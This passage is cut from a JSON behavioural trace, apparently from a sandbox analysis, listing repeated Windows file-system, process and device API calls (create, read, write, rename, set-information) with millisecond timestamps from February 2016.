"2016-02-16 
17:41:56,233", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,233", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,233", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,243", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,243", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,253", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,253", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:56,263", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,263", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,263", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,273", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,273", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,283", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,283", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,293", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,303", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,303", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,303", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,313", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,313", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,323", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,333", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,333", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,333", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,333", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,343", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,343", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,353", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtWriteFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,353", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,363", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,363", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:56,373", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,373", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,373", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,383", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,383", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,393", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,393", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,403", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,403", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:56,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,413", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,413", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,423", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,423", "api": "NtCreateFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:56,423", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,433", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,433", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:56,443", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,443", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,443", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,453", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,453", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,463", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,463", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,473", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,473", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,483", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,483", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,493", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,493", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,493", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,503", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,503", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,513", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,513", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:56,523", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:56,523", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 